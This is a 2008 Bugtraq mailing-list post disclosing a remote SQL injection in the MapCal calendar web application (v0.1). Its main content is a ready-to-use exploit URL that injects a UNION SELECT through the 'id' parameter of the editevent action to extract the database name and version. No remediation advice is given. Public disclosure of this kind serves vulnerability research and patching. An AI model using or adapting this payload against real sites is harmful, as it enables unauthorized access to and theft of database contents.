MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection
From: Guns@xxxxxxxxxxx
Date: 21 Sep 2008 03:00:40 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

       _____          ____   _____
      /  _  \ /\  /\ / _  \ /  _  \
      | | | | \ \/ / ||_| | | | | |  
      | | | |  \  /  \_   | | | | |  
      | |_| |  /  \   __\ | | |_| |
      \_____/ / /\ \ |____/ \_____/
              \/  \/

[~] MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: MapCal - The Mapping Calendar

[~] site: http://mapcal.sourceforge.net

[~] Vulnerability Class: SQL Injection



[~] Exploit:

http://localhost/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events

Prev by Date: drupal: Session hijacking vulnerability, CVE-2008-3661
Next by Date: Blue Coat xss
Previous by thread: drupal: Session hijacking vulnerability, CVE-2008-3661
Next by thread: Blue Coat xss
Index(es):
- Date
- Thread